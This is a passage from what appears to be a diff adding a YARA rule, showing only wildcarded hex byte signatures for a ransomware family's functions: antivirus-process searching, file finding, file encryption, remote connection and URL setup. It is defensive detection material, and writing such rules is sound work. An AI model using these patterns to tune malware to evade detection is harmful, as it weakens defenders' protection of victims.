+            8B E5 5D C3 8B 5D ?? EB ?? 8D A4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D6 F6 85 ?? ?? ?? ?? ?? 74 ?? 68
+            ?? ?? ?? ?? 57 FF D6 8B 55 ?? 8B CF 53 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? FF 75 ?? 8B 03 8D 95 ?? ?? ?? ?? 8B 73 ?? 51 8B CF 89 45 ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 01 03 11 53 ?? 3B 73 ?? 77 ?? 72 ?? 8B 45 ?? 3B 03 73 ?? 8B 45 ?? FF 00 8B 35 ??
+            ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 B8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A
+            ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
+            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
+            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
+            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
+            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+		$search_antivirus_processes_v2 = {
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8B F0 6A ?? 89 74 24 ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? C7 03 ??
+            ?? ?? ?? 83 FE ?? 74 ?? 53 56 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 4B ?? 33 F6 EB
+            ?? 8D A4 24 ?? ?? ?? ?? 90 51 FF 74 B4 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 73 ?? 50
+            6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 74 ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 57 8B 3D ?? ??
+            ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 46 8D 4B ?? 83 FE ?? 72 ?? 8B 74 24 ?? 53 56 FF
+            15 ?? ?? ?? ?? 8D 4B ?? 85 C0 75 ?? 85 DB 74 ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ??
+            ?? ?? 56 FF D7 5F 5E 5B 8B E5 5D C3
+        }
+		$find_files_v2_1 = {
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D3 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? F7 D8 1B C0 40 75 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 3C 46 89 7D ?? FF D3 8D 85 ?? ??
+            ?? ?? 50 56 FF 15 ?? ?? ?? ?? 33 C9 89 45 ?? 66 89 0F 83 F8 ?? 75 ?? B8 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3 8B 7D ?? EB ?? 8D 9B ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF D3 F6 85 ?? ??
+            ?? ?? ?? 74 ?? 83 7D ?? ?? 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 8B 55 ?? 8B CE 6A ?? 57 FF 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 89 45 ?? 8B 47 ?? 6A ?? 89 45 ?? FF 15 ?? ?? ?? ?? 56 8B D8 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 6A ??
+            53 FF 15 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 8B 45 ?? 8B 4D ?? EB ?? 83 BD ?? ?? ??
+            ?? ?? 0F 57 C0 66 0F 13 45 ?? 72 ?? 51 FF 75 ?? 8B CB E8 ?? ?? ?? ?? 83 C4 ?? 89 55
+            ?? EB ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 6A ?? 53 89 45 ?? FF 15 ?? ?? ??
+            ?? 8B 45 ?? 8B 4D ?? 01 0F 11 47 ?? 8B 45 ?? 3B 47 ?? 77 ?? 72 ?? 8B 45 ?? 3B 07 73
+            ?? 8B 45 ?? FF 00 8B 1D ?? ?? ?? ?? 8B 45 ?? 33 C9 66 89 08 8D 85 ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 33
+            C0 5B 8B E5 5D C3
+        }
+		$crypt_files_v2_1 = {
+            FF 15 ?? ?? ?? ?? 33 D2 89 44 24 ?? 89 44 24 ?? 8D 0C B7 8D 0C CD ?? ?? ?? ?? 85 C0
+            74 ?? 3B CB 73 ?? 8D 3C 01 89 44 24 ?? 89 7C 24 ?? 8B D1 EB ?? 89 54 24 ?? 8B F8 8B
+            4D ?? 8D 34 CD ?? ?? ?? ?? 85 C0 74 ?? 8D 0C 32 89 4C 24 ?? 3B CB 73 ?? 8B 54 24 ??
+            8B CF 89 7C 24 ?? 03 FE 89 7C 24 ?? EB ?? 33 C9 89 4C 24 ?? 8B 74 24 ?? 85 C0 74 ??
+            8D 04 F5 ?? ?? ?? ?? 03 C2 3B C3 72 ?? 33 FF 89 7C 24 ?? 8B 1D ?? ?? ?? ?? 85 C9 0F
+            84 ?? ?? ?? ?? 8B 55 ?? 8B 1D ?? ?? ?? ?? 8D 04 12 89 44 24 ?? 8D 44 24 ?? 50 51 68
+            ?? ?? ?? ?? 52 FF 75 ?? FF D3 8D 04 36 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ?? ??
+            56 FF 74 24 ?? FF D3 8B 1D ?? ?? ?? ?? 57 FF D3 FF 74 24 ?? 8B F0 FF D3 6A ?? 83 C6
+            ?? 03 C6 68 ?? ?? ?? ?? 50 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? 8B F0 C7
+            44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 74 24 ?? FF D3 40 85 F6 74 ?? 3B 44 24 ?? 73 ??
+            8D 0C 06 89 44 24 ?? 89 4C 24 ?? 89 74 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 57 FF D3
+            40 85 F6 74 ?? 03 44 24 ?? 3B 44 24 ?? 72 ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 24 ?? 33
+            F6 FF D3 85 C0 74 ?? 8B 4C 24 ?? 8B 7C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
+            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 7C 24 ?? 57 33 F6
+            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? EB ?? 8D 49 ?? 8A 04 3E 3C ?? 74 ?? 3C ??
+            74 ?? 88 01 41 89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 8B 1D ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D3 56 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 8D 3C 46 57 E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68 ?? ?? ?? ?? 57 FF D3 68
+            ?? ?? ?? ?? 57 FF D3 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ??
+            FF 74 24 ?? 8D 34 47 FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D3 57 FF 15 ?? ?? ?? ?? FF 74 24 ?? 8D 34 47
+            FF 15 ?? ?? ?? ?? 50 56 6A ?? FF 74 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33
+            C0 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 66 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 58 58 8D 44 24 ?? 50 57 FF
+            D3 8B 5C 24 ?? 8B 35 ?? ?? ?? ?? 53 FF D6 6A ?? C1 E0 ?? 83 C0 ?? 68 ?? ?? ?? ?? 50
+            6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B F8 53 89 7C 24 ?? FF D6 8D 04 C5 ?? ?? ?? ??
+            85 FF 74 ?? 3B 44 24 ?? 72 ?? 33 FF 53 FF D6 8B 0D ?? ?? ?? ?? 8B F0 89 74 24 ?? 85
+            C9 74 ?? 68 ?? ?? ?? ?? 6A ?? 51 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 6A ?? 68 ?? ?? ?? ??
+            53 FF 15 ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ??
+            53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B 5C 24 ?? 03 F6 8B D6 8B CB E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 8D 04 CD ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 50 57 68 ?? ?? ??
+            ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 57 FF D3
+            6A ?? 68 ?? ?? ?? ?? 8D 70 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 57 89 44 24 ?? FF D3 8D 48
+            ?? 8B 44 24 ?? 85 C0 74 ?? 89 44 24 ?? 3B CE 72 ?? C7 44 24 ?? ?? ?? ?? ?? 57 33 F6
+            FF D3 85 C0 74 ?? 8B 4C 24 ?? 89 4C 24 ?? 8A 04 3E 3C ?? 74 ?? 3C ?? 74 ?? 88 01 41
+            89 4C 24 ?? 57 46 FF D3 8B 4C 24 ?? 3B F0 72 ?? 8B 74 24 ?? 56 FF D3 50 FF 74 24 ??
+            6A ?? 56 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 7C 24 ?? 8D 54 24 ?? 6A ?? 57 8B
+            CE C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 1D ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 8B 44 24 ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 68 ?? ??
+            ?? ?? 6A ?? FF 74 24 ?? FF D3 33 F6 EB ?? 8B 4C 24 ?? 85 C9 74 ?? 8B 45 ?? 89 08 8B
+            44 24 ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 FF D3 68 ?? ?? ?? ?? 6A ?? FF 74
+            24 ?? FF D3 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF D3 EB ?? 8B 7C 24 ?? 83 7C 24 ?? ??
+            75 ?? 68 ?? ?? ?? ?? 6A ?? 57 FF D3 BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 74 24 ??
+            FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 5F 8B C6 5E 5B 8B E5 5D C3
+        }
+		$remote_connection_v2_1 = {
+            53 89 45 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 3C 45 ?? ??
+            ?? ?? 8D 47 ?? 50 6A ?? FF D6 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B D8 FF D6
+            89 45 ?? 85 DB 74 ?? 8D 47 ?? 3B F8 73 ?? 8B F3 EB ?? 33 F6 FF 75 ?? 56 FF 15 ?? ??
+            ?? ?? F3 0F 6F 05 ?? ?? ?? ?? 56 F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45
+            ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3
+            0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? F3 0F 6F 05 ?? ?? ?? ?? F3 0F 7F 45 ?? FF 15 ??
+            ?? ?? ?? 8D 45 ?? 33 FF 50 FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 68 ?? ?? ?? ?? 83 EC ??
+            68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 50 56 FF 75 ?? 8B 75 ?? 8D 4D ?? 56 E8
+            ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? BF ?? ?? ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? C7 45 ??
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 85 C0 74 ?? 8B 4D ?? 89 01 EB ?? 33
+            FF 68 ?? ?? ?? ?? 6A ?? 56 8B 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF
+            D6 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 45 ?? 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C7 5F
+            5E 5B 8B E5 5D C3
+        }
+		$search_antivirus_processes_v4_1_2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 8B F8 53 6A ??
+            89 7D ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 89 1E 83 FF ?? 74 ?? 56 57 FF 15 ?? ??
+            ?? ?? 33 DB 8D 7E ?? 57 FF B4 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 76 ??
+            50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 43 83 FB ?? 72 ?? 8B 7D ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 85
+            F6 74 ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+		$find_files_v4_1_2 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 33 FF 89 54 24 ?? 8B F1 89 7C 24 ?? 39
+            7D ?? 75 ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 85 C0 75 ?? 85 DB 75 ?? 33 C0 E9
+            ?? ?? ?? ?? 33 DB 43 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 66 83 3E ?? 74 ?? 8D 54 24 ??
+            89 7C 24 ?? 8B CE E8 ?? ?? ?? ?? 89 44 24 ?? 39 7C 24 ?? 75 ?? 56 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 04 46 89 44 24 ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ??
+            ?? ?? ?? 8B 4C 24 ?? 33 D2 89 44 24 ?? 66 89 11 83 F8 ?? 75 ?? BF ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ??
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 44 24 ?? 50 56 FF 15 ?? ?? ?? ?? F6
+            44 24 ?? ?? 74 ?? 85 DB 74 ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 68 ??
+            ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8B 54 24 ?? 8B CE E8 ?? ?? ?? ?? EB ?? 68 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 57 EB ?? FF 74 24 ?? 8D 54 24 ?? 8B CE E8 ?? ?? ?? ?? 59
+            8B 44 24 ?? 33 C9 66 89 08 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B C7 5F 5E
+            5B 8B E5 5D C3
+        }
+		$crypt_files_v4_1_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 89 4D ?? 33 DB 57 B9 ?? ?? ?? ?? 89 5D ?? 8B F2 E8
+            ?? ?? ?? ?? 8B F8 8D 55 ?? 56 57 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 84
+            ?? ?? ?? ?? 53 53 6A ?? 53 53 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE
+            ?? 0F 84 ?? ?? ?? ?? 6A ?? 58 88 5D ?? 48 75 ?? 51 51 8D 55 ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 89 5D ?? 89
+            5D ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 89 5D ?? 53 8D
+            45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D
+            ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 81 F9 ?? ?? ?? ?? 6A ?? 5A 0F 42 C2 01 8F ?? ??
+            ?? ?? 8B 55 ?? 8D 8D ?? ?? ?? ?? 11 9F ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 50 FF 75 ?? 89
+            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 33 C9 F7 D8 41 99 51 53 52 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? FF 75 ?? 56 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 8B 7D ?? 6A ?? FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75 ?? 57 56 FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? 8B 7D ?? 8B 4D ?? 85 C9 0F 84 ?? ?? ?? ?? 53 8D 45 ?? 50 68
+            ?? ?? ?? ?? 57 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B D8 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ??
+            ?? ?? 56 FF 15 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 33 C0 8D
+            48 ?? 89 4D ?? EB
+        }
+		$remote_connection_v4_1_2 = {
+            55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 8B F1 57 83 7E ?? ?? 74 ?? FF 76 ?? FF D3
+            8B CE E8 ?? ?? ?? ?? 33 FF 57 57 6A ?? 57 57 FF 75 ?? FF 75 ?? FF 76 ?? FF 15 ?? ??
+            ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ??
+            83 C4 ?? B8 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C8 57 51 57 57 68
+            ?? ?? ?? ?? 56 8B 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 74 ?? FF
+            75 ?? FF 75 ?? FF 75 ?? FF 75 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 47 EB ?? FF
+            15 ?? ?? ?? ?? 8B 45 ?? 50 FF D3 56 FF D3 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 5F 5E 5B 8B
+            E5 5D C2
+        }
+		$url_parameters_setup_v4_1_2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 15 ?? ?? ?? ?? 33 FF 57 57 57 FF 15 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 57 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ??
+            ?? ?? ?? 83 EC ?? 33 DB 43 53 83 EC ?? 53 51 53 51 53 51 53 51 53 83 EC ?? 53 51 53
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 85 C0 74 ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
+            D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF D6 68
